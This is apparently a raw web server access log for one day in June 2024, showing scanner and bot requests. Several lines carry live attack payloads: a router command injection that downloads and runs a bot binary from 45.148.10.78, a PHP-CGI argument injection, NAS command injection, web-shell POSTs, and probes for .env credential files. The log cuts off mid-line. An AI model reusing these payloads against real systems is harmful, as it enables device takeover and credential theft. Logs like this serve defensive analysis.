117.253.59.50 - - [17/Jun/2024:00:35:04 +0200] "GET / HTTP/1.1" 200 1895 206.217.128.98 - - [17/Jun/2024:00:35:20 +0200] "GET / HTTP/1.1" 200 1895 8.218.73.108 - - [17/Jun/2024:01:16:24 +0200] "GET / HTTP/1.1" 200 1895 24.144.96.191 - - [17/Jun/2024:01:44:04 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [17/Jun/2024:02:07:42 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 152.32.199.73 - - [17/Jun/2024:02:11:26 +0200] "-" 400 1930 152.32.199.73 - - [17/Jun/2024:02:11:37 +0200] "GET / HTTP/1.1" 200 1895 152.32.199.73 - - [17/Jun/2024:02:11:55 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.199.73 - - [17/Jun/2024:02:11:56 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.199.73 - - [17/Jun/2024:02:11:56 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 185.244.36.221 - - [17/Jun/2024:02:16:00 +0200] "GET / HTTP/1.1" 200 1895 94.156.8.2 - - [17/Jun/2024:02:16:35 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 64.62.156.55 - - [17/Jun/2024:02:32:43 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.58 - - [17/Jun/2024:02:33:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.55 - - [17/Jun/2024:02:33:16 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.57 - - [17/Jun/2024:02:33:28 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 194.165.16.76 - - [17/Jun/2024:02:49:12 +0200] "-" 400 1930 176.123.1.244 - - [17/Jun/2024:02:58:08 +0200] "GET / HTTP/1.1" 200 1895 185.191.126.213 - - [17/Jun/2024:04:09:59 +0200] "GET / HTTP/1.1" 200 1895 194.59.31.99 - - [17/Jun/2024:04:38:49 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 206.168.34.56 - - [17/Jun/2024:04:39:47 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.56 - - [17/Jun/2024:04:39:53 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.56 - - [17/Jun/2024:04:39:56 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [17/Jun/2024:04:43:43 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.82 - - [17/Jun/2024:05:10:05 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 729 141.98.11.82 - - [17/Jun/2024:05:10:05 +0200] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 1895 91.92.245.67 - - [17/Jun/2024:05:12:53 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 91.92.245.67 - - [17/Jun/2024:05:12:54 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 141.98.11.15 - - [17/Jun/2024:05:22:23 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 193.109.85.36 - - [17/Jun/2024:05:24:24 +0200] "-" 400 1930 146.190.233.209 - - [17/Jun/2024:05:41:36 +0200] "-" 400 1930 146.190.233.209 - - [17/Jun/2024:05:41:36 +0200] "-" 400 1930 146.190.233.209 - - [17/Jun/2024:05:41:36 +0200] "GET / HTTP/1.1" 200 1895 146.190.233.209 - - [17/Jun/2024:05:41:36 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 87.121.69.27 - - [17/Jun/2024:05:44:04 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.73 - - [17/Jun/2024:06:21:56 +0200] "-" 400 1930 198.235.24.73 - - [17/Jun/2024:06:21:57 +0200] "-" 400 1930 185.244.36.221 - - [17/Jun/2024:06:26:17 +0200] "GET / HTTP/1.1" 200 1895 103.252.136.86 - - [17/Jun/2024:06:29:00 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 20.118.71.68 - - [17/Jun/2024:06:38:18 +0200] "GET /actuator/health HTTP/1.1" 404 737 181.78.192.132 - - [17/Jun/2024:07:46:12 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 194.59.31.99 - - [17/Jun/2024:07:53:57 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.121.69.27 - - [17/Jun/2024:08:49:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [17/Jun/2024:08:59:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [17/Jun/2024:08:59:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 38.114.121.47 - - [17/Jun/2024:09:05:50 +0200] "-" 400 1930 38.114.121.47 - - [17/Jun/2024:09:05:50 +0200] "GET /nacos/v1/console/namespaces HTTP/1.1" 404 757 184.105.139.115 - - [17/Jun/2024:09:25:20 +0200] "-" 400 1930 185.244.36.221 - - [17/Jun/2024:09:29:15 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [17/Jun/2024:09:53:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.102 - - [17/Jun/2024:10:21:47 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.102 - - [17/Jun/2024:10:21:51 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.102 - - [17/Jun/2024:10:21:51 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.148.10.174 - - [17/Jun/2024:11:33:34 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [17/Jun/2024:11:33:34 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 141.98.11.15 - - [17/Jun/2024:11:44:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 179.60.147.13 - - [17/Jun/2024:13:01:46 +0200] "-" 400 1930 87.121.69.27 - - [17/Jun/2024:13:38:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 47.56.15.58 - - [17/Jun/2024:14:02:59 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [17/Jun/2024:14:21:46 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [17/Jun/2024:14:23:04 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [17/Jun/2024:14:23:06 +0200] "GET /robots.txt HTTP/1.1" 404 728 103.252.136.86 - - [17/Jun/2024:15:05:48 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [17/Jun/2024:15:15:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [17/Jun/2024:15:15:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.141.86.171 - - [17/Jun/2024:15:25:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 213.238.180.238 - - [17/Jun/2024:15:25:57 +0200] "GET / HTTP/1.1" 200 1895 117.235.72.126 - - [17/Jun/2024:15:37:33 +0200] "GET / HTTP/1.1" 200 1895 117.235.72.126 - - [17/Jun/2024:15:37:33 +0200] "GET / HTTP/1.1" 200 1895 117.235.72.126 - - [17/Jun/2024:15:37:33 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [17/Jun/2024:16:30:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 152.32.157.92 - - [17/Jun/2024:16:35:50 +0200] "-" 400 1930 152.32.157.92 - - [17/Jun/2024:16:36:00 +0200] "GET / HTTP/1.1" 200 1895 152.32.157.92 - - [17/Jun/2024:16:36:18 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.157.92 - - [17/Jun/2024:16:36:19 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.157.92 - - [17/Jun/2024:16:36:19 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 141.98.11.15 - - [17/Jun/2024:16:54:47 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [17/Jun/2024:16:58:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [17/Jun/2024:16:58:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.246.7.54 - - [17/Jun/2024:17:06:10 +0200] "GET / HTTP/1.0" 200 1895 14.53.4.140 - - [17/Jun/2024:17:25:15 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 45.148.10.174 - - [17/Jun/2024:17:31:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [17/Jun/2024:17:31:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 13.83.41.180 - - [17/Jun/2024:17:48:25 +0200] "GET /hudson HTTP/1.1" 404 724 212.210.109.218 - - [17/Jun/2024:17:52:16 +0200] "GET / HTTP/1.0" 200 1895 179.60.147.13 - - [17/Jun/2024:17:55:25 +0200] "-" 400 1930 165.232.142.253 - - [17/Jun/2024:18:00:54 +0200] "-" 400 1930 103.252.136.86 - - [17/Jun/2024:18:05:17 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [17/Jun/2024:18:16:18 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:16:18 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:16:18 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:16:18 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:16:19 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:16:20 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:16:21 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:16:21 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:16:21 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:16:24 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:21:03 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:21:05 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:21:05 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:21:06 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:21:07 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:21:07 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:21:07 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:21:08 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:21:08 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:21:08 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:26:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:26:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:26:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:26:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:26:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:26:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:26:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:26:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:26:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:26:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [17/Jun/2024:18:30:24 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:30:24 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:30:24 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:30:24 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:30:25 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:30:25 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:30:25 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:30:25 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:30:25 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [17/Jun/2024:18:30:25 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 206.168.32.99 - - [17/Jun/2024:18:38:08 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.99 - - [17/Jun/2024:18:38:11 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.99 - - [17/Jun/2024:18:38:12 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [17/Jun/2024:19:07:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.55 - - [17/Jun/2024:19:46:41 +0200] "GET /.most/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 141.98.11.55 - - [17/Jun/2024:19:46:41 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 745 141.98.11.55 - - [17/Jun/2024:19:46:41 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 141.98.11.55 - - [17/Jun/2024:19:46:41 +0200] "GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 741 45.83.66.52 - - [17/Jun/2024:19:52:28 +0200] "GET / HTTP/1.1" 200 1895 45.83.66.129 - - [17/Jun/2024:19:52:28 +0200] "GET /favicon.ico HTTP/1.1" 404 729 44.220.188.176 - - [17/Jun/2024:19:55:14 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [17/Jun/2024:20:03:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [17/Jun/2024:20:03:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 104.168.70.165 - - [17/Jun/2024:20:04:26 +0200] "GET / HTTP/1.1" 200 1895 52.249.35.104 - - [17/Jun/2024:20:31:55 +0200] "-" 400 1930 141.98.11.55 - - [17/Jun/2024:20:40:18 +0200] "GET /.most/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 141.98.11.55 - - [17/Jun/2024:20:40:18 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 745 141.98.11.55 - - [17/Jun/2024:20:40:18 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 141.98.11.55 - - [17/Jun/2024:20:40:18 +0200] "GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 741 118.193.47.114 - - [17/Jun/2024:20:46:10 +0200] "-" 400 1930 118.193.47.114 - - [17/Jun/2024:20:46:21 +0200] "GET / HTTP/1.1" 200 1895 118.193.47.114 - - [17/Jun/2024:20:46:40 +0200] "GET /favicon.ico HTTP/1.1" 404 729 118.193.47.114 - - [17/Jun/2024:20:46:40 +0200] "GET /robots.txt HTTP/1.1" 404 728 118.193.47.114 - - [17/Jun/2024:20:46:41 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 167.94.146.57 - - [17/Jun/2024:21:16:17 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.57 - - [17/Jun/2024:21:16:20 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.57 - - [17/Jun/2024:21:16:20 +0200] "GET /favicon.ico HTTP/1.1" 404 729 78.108.177.52 - - [17/Jun/2024:21:33:35 +0200] "GET / HTTP/1.0" 200 1895 141.98.11.55 - - [17/Jun/2024:21:51:55 +0200] "GET /.most/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 141.98.11.55 - - [17/Jun/2024:21:51:55 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 745 141.98.11.55 - - [17/Jun/2024:21:51:55 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 141.98.11.55 - - [17/Jun/2024:21:51:55 +0200] "GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 741 206.168.32.104 - - [17/Jun/2024:22:02:15 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.104 - - [17/Jun/2024:22:02:18 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.104 - - [17/Jun/2024:22:02:18 +0200] "GET /favicon.ico HTTP/1.1" 404 729 168.232.15.118 - - [17/Jun/2024:22:02:31 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [17/Jun/2024:22:07:41 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 91.92.245.67 - - [17/Jun/2024:22:10:02 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 91.92.245.67 - - [17/Jun/2024:22:10:02 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.155.91.134 - - [17/Jun/2024:22:19:22 +0200] "GET / HTTP/1.1" 200 1895 45.155.91.134 - - [17/Jun/2024:22:19:22 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.155.91.134 - - [17/Jun/2024:22:19:22 +0200] "GET / HTTP/1.1" 200 1895 45.155.91.134 - - [17/Jun/2024:22:19:22 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 141.98.11.55 - - [17/Jun/2024:22:21:25 +0200] "GET /.most/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 141.98.11.55 - - [17/Jun/2024:22:21:25 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 745 141.98.11.55 - - [17/Jun/2024:22:21:25 +0200] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 743 141.98.11.55 - - [17/Jun/2024:22:21:25 +0200] "GET /.most/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1" 404 741 94.156.71.235 - - [17/Jun/2024:22:48:17 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 2.57.169.183 - - [17/Jun/2024:23:15:25 +0200] "GET / HTTP/1.1" 200 1895 2.57.169.185 - - [17/Jun/2024:23:15:25 +0200] "GET / HTTP/1.1" 200 1895 2.57.169.183 - - [17/Jun/2024:23:15:26 +0200] "GET /.DS_Store HTTP/1.1" 404 727 2.57.169.184 - - [17/Jun/2024:23:15:26 +0200] "GET /.env HTTP/1.1" 404 722 2.57.169.183 - - [17/Jun/2024:23:15:26 +0200] "POST /.env HTTP/1.1" 404 722 2.57.169.183 - - [17/Jun/2024:23:15:27 +0200] "GET /.env.save HTTP/1.1" 404 727 2.57.169.183 - - [17/Jun/2024:23:15:28 +0200] "POST /.env.save HTTP/1.1" 404 727 2.57.169.184 - - [17/Jun/2024:23:15:28 +0200] "GET /.env.old HTTP/1.1" 404 726 2.57.169.184 - - [17/Jun/2024:23:15:35 +0200] "GET /.env.prod HTTP/1.1" 404 727 2.57.169.183 - - [17/Jun/2024:23:15:35 +0200] "POST /.env.prod HTTP/1.1" 404 727 2.57.169.185 - - [17/Jun/2024:23:15:36 +0200] "GET /.env.production HTTP/1.1" 404 733 2.57.169.185 - - [17/Jun/2024:23:15:37 +0200] "POST /.env.production HTTP/1.1" 404 733 2.57.169.183 - - [17/Jun/2024:23:15:37 +0200] "GET /.env.development%20 HTTP/1.1" 404 737 2.57.169.183 - - [17/Jun/2024:23:15:42 +0200] "GET /laravel/.env%20 HTTP/1.1" 404 737 2.57.169.183 - - [17/Jun/2024:23:15:48 +0200] "GET /admin-app/.env%20 HTTP/1.1" 404 739 2.57.169.183 - - [17/Jun/2024:23:15:48 +0200] "POST /admin-app/.env%20 HTTP/1.1" 404 739 2.57.169.183 - - [17/Jun/2024:23:15:54 +0200] "GET /app/.env%20 HTTP/1.1" 404 733 2.57.169.184 - - [17/Jun/2024:23:15:54 +0200] "POST /app/.env%20 HTTP/1.1" 404 733 2.57.169.183 - - [17/Jun/2024:23:15:55 +0200] "GET /development/.env%20 HTTP/1.1" 404 741 2.57.169.183 - - [17/Jun/2024:23:16:00 +0200] "GET /apps/.env%20 HTTP/1.1" 404 734 2.57.169.183 - - [17/Jun/2024:23:16:01 +0200] "POST /apps/.env%20 HTTP/1.1" 404 734 2.57.169.185 - - [17/Jun/2024:23:16:03 +0200] "GET /cp/.env HTTP/1.1" 404 729 2.57.169.185 - - [17/Jun/2024:23:16:03 +0200] "POST /cp/.env HTTP/1.1" 404 729 2.57.169.183 - - [17/Jun/2024:23:16:03 +0200] "GET /private/.env HTTP/1.1" 404 734 2.57.169.183 - - [17/Jun/2024:23:16:04 +0200] "POST /private/.env HTTP/1.1" 404 734 2.57.169.184 - - [17/Jun/2024:23:16:09 +0200] "GET /redmine/.env HTTP/1.1" 404 734 2.57.169.184 - - [17/Jun/2024:23:16:10 +0200] "POST /redmine/.env HTTP/1.1" 404 734 2.57.169.185 - - [17/Jun/2024:23:16:11 +0200] "GET /docker/.env HTTP/1.1" 404 733 2.57.169.183 - - [17/Jun/2024:23:16:11 +0200] "POST /docker/.env HTTP/1.1" 404 733 2.57.169.183 - - [17/Jun/2024:23:16:11 +0200] "GET /cms/.env HTTP/1.1" 404 730 2.57.169.184 - - [17/Jun/2024:23:16:12 +0200] "POST /cms/.env HTTP/1.1" 404 730 2.57.169.185 - - [17/Jun/2024:23:16:18 +0200] "GET /live_env%20 HTTP/1.1" 404 729 2.57.169.185 - - [17/Jun/2024:23:16:19 +0200] "POST /live_env%20 HTTP/1.1" 404 729 2.57.169.183 - - [17/Jun/2024:23:16:19 +0200] "GET /application/.env HTTP/1.1" 404 738 2.57.169.183 - - [17/Jun/2024:23:16:24 +0200] "GET /.env.project%20 HTTP/1.1" 404 733 2.57.169.184 - - [17/Jun/2024:23:16:25 +0200] "POST /.env.project%20 HTTP/1.1" 404 733 2.57.169.183 - - [17/Jun/2024:23:16:36 +0200] "GET 